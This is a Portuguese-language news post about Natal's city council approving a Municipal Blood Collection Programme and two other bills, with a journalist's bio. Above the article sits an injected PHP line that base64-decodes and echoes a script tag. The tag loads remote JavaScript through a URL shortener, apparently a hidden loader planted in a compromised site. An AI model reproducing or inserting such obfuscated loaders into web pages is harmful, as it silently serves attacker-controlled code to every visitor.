$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Vereadores aprovam criação do Programa Municipal de Coleta de Sangue

Vereadores aprovam criação do Programa Municipal de Coleta de Sangue
23 Mar 2016

A Câmara Municipal de Natal (CMN) discorreu sobre três projetos de lei na tarde desta quarta-feira (23). Um dos destaque foi a matéria que cria o Programa Municipal de Coleta de Sangue (PL Nº197/2013) , de autoria da vereadora Júlia Arruda, aprovada em segunda discussão. O objetivo do projeto é incentivar as doações de sangue em Natal, através de campanhas permanentes ao longo do ano.

De acordo com a vereadora autora do projeto, a ideia é que a Prefeitura de Natal crie ações em parceria com as empresas de coleta existentes, como a Hemovida e Hemonorte, para aumentar o banco de sangue. Uma das proposições é que as unidades móveis dessas empresas possam ir frequentemente às comunidades, fazendo mutirões.

“Percebe-se que surge um grande número de doadores quando há campanhas educativas nas proximidades de grandes eventos, como o Carnatal e o Carnaval. Com o projeto, queremos que essas campanhas se estendam ao longo do ano, de forma permanente, mobilizando os natalenses “, explicou Júlia Arruda.

O vereador Paulinho Freire (SD), empresário da área de eventos, destacou a importância do projeto. “É um plano de grande alcance social. Para se ter uma ideia, só a campanha de doação realizada no período do Carnatal abastece os bancos de sangue por uns três meses”, enfatizou.

Os parlamentares ainda aprovaram mais dois projetos na tarde de hoje, em primeira discussão: o PL 65/2015, de autoria de Fernando Lucena (PT), exigindo que todas as obras no âmbito da administração pública tenham garantia; e o PL 173/2015, de Franklin Capistrano (PSB), que torna obrigatória a disposição dos valores dos medicamentos nas farmácias, em local visível e de fácil acesso, conforme relação de preços publicados no Diário Oficial da União.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *